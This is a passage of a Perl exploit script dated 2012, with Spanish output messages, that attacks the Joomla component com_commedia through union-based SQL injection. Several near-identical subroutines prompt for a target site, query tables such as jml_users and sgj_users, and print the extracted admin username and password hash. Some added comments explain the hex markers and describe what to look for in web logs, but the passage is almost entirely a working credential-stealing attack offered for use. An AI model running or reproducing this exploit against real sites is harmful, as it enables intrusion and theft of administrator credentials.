       $host = $target ."index.php?option=".$d4n."=raw&task=".$parametro."=999999.9 union all select (select concat(0x3c757365723e,".$user.",0x3c757365723e3c706173733e,count(*),".$pass.",0x3c706173733e) from ".$table."),null--";
    $res = $b->request(HTTP::Request->new(GET=>$host));
    $answer = $res->content;
    
    if ($answer =~ /<user>(.*?)<user>/){
            print "\nLos Datos Extraidos son:\n";
      print "\n
     
* Admin User : $1";
     
    }
    
    if ($answer =~/<pass>(.*?)<pass>/){print "\n
     
* Admin Hash : $1\n\n";
     
    print "\t\t#   El Exploit aporto usuario y password   #\n\n";}
    else{print "\n[-] Exploit Failed, Intente manualmente...\n";}
}

sub jml_users {

# Prompts for the site base URL and runs the union-based query against the
# "jml_users" table. Identical to jos_users apart from $table.
print "\nIngrese el Sitio:[http://wwww.site.com/path/]: ";


chomp(my $target=<STDIN>);

    # $user/$pass are column names selected from the users table, not
    # credentials supplied by the operator.
    #the username of  joomla
    $user="username";
    #the pasword of  joomla
    $pass="password";
    #the tables of joomla
    $table="jml_users";
    $d4n="com_commedia&format";
    $parametro="down&pid=59&id";
    
    # Note: $b is also Perl's sort() comparator variable; harmless here since
    # nothing sorts, but an unusual choice of name.
    $b = LWP::UserAgent->new() or die "Could not initialize browser\n";
    $b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
    # The hex constants decode to "<user>", "<user><pass>" and "<pass>"; they
    # bracket the returned values so the regexes below can find them. In web
    # logs the request to look for is option=com_commedia with "union all
    # select" and these hex markers in the id= parameter.
       $host = $target ."index.php?option=".$d4n."=raw&task=".$parametro."=999999.9 union all select (select concat(0x3c757365723e,".$user.",0x3c757365723e3c706173733e,count(*),".$pass.",0x3c706173733e) from ".$table."),null--";
    $res = $b->request(HTTP::Request->new(GET=>$host));
    $answer = $res->content;
    
    if ($answer =~ /<user>(.*?)<user>/){
            print "\nLos Datos Extraidos son:\n";
      print "\n
     
* Admin User : $1";
     
    }
    
    if ($answer =~/<pass>(.*?)<pass>/){print "\n
     
* Admin Hash : $1\n\n";
     
    print "\t\t#   El Exploit aporto usuario y password   #\n\n";}
    else{print "\n[-] Exploit Failed, Intente manualmente...\n";}
}

sub muc_users {

# Prompts for the site base URL and runs the union-based query against the
# "muc_users" table. Identical to jos_users apart from $table.
print "\nIngrese el Sitio:[http://wwww.site.com/path/]: ";


chomp(my $target=<STDIN>);

    # $user/$pass are column names selected from the users table, not
    # credentials supplied by the operator.
    #the username of  joomla
    $user="username";
    #the pasword of  joomla
    $pass="password";
    #the tables of joomla
    $table="muc_users";
    $d4n="com_commedia&format";
    $parametro="down&pid=59&id";
    
    # Note: $b is also Perl's sort() comparator variable; harmless here since
    # nothing sorts, but an unusual choice of name.
    $b = LWP::UserAgent->new() or die "Could not initialize browser\n";
    $b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
    # The hex constants decode to "<user>", "<user><pass>" and "<pass>"; they
    # bracket the returned values so the regexes below can find them. In web
    # logs the request to look for is option=com_commedia with "union all
    # select" and these hex markers in the id= parameter.
       $host = $target ."index.php?option=".$d4n."=raw&task=".$parametro."=999999.9 union all select (select concat(0x3c757365723e,".$user.",0x3c757365723e3c706173733e,count(*),".$pass.",0x3c706173733e) from ".$table."),null--";
    $res = $b->request(HTTP::Request->new(GET=>$host));
    $answer = $res->content;
    
    if ($answer =~ /<user>(.*?)<user>/){
            print "\nLos Datos Extraidos son:\n";
      print "\n
     
* Admin User : $1";
     
    }
    
    if ($answer =~/<pass>(.*?)<pass>/){print "\n
     
* Admin Hash : $1\n\n";
     
    print "\t\t#   El Exploit aporto usuario y password   #\n\n";}
    else{print "\n[-] Exploit Failed, Intente manualmente...\n";}
}

sub sgj_users {

# Prompts for the site base URL and runs the union-based query against the
# "sgj_users" table. Identical to jos_users apart from $table.
print "\nIngrese el Sitio:[http://wwww.site.com/path/]: ";


chomp(my $target=<STDIN>);

    # $user/$pass are column names selected from the users table, not
    # credentials supplied by the operator.
    #the username of  joomla
    $user="username";
    #the pasword of  joomla
    $pass="password";
    #the tables of joomla
    $table="sgj_users";
    $d4n="com_commedia&format";
    $parametro="down&pid=59&id";
    
    # Note: $b is also Perl's sort() comparator variable; harmless here since
    # nothing sorts, but an unusual choice of name.
    $b = LWP::UserAgent->new() or die "Could not initialize browser\n";
    $b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
    # The hex constants decode to "<user>", "<user><pass>" and "<pass>"; they
    # bracket the returned values so the regexes below can find them. In web
    # logs the request to look for is option=com_commedia with "union all
    # select" and these hex markers in the id= parameter.
       $host = $target ."index.php?option=".$d4n."=raw&task=".$parametro."=999999.9 union all select (select concat(0x3c757365723e,".$user.",0x3c757365723e3c706173733e,count(*),".$pass.",0x3c706173733e) from ".$table."),null--";
    $res = $b->request(HTTP::Request->new(GET=>$host));
    $answer = $res->content;
    
    if ($answer =~ /<user>(.*?)<user>/){
            print "\nLos Datos Extraidos son:\n";
      print "\n
     
* Admin User : $1";
     
    }
    
    if ($answer =~/<pass>(.*?)<pass>/){print "\n
     
* Admin Hash : $1\n\n";
     
    print "\t\t#   El Exploit aporto usuario y password   #\n\n";}
    else{print "\n[-] Exploit Failed, Intente manualmente...\n";}
}

  
_____________________________________________________
Daniel Barragan "D4NB4R" 2012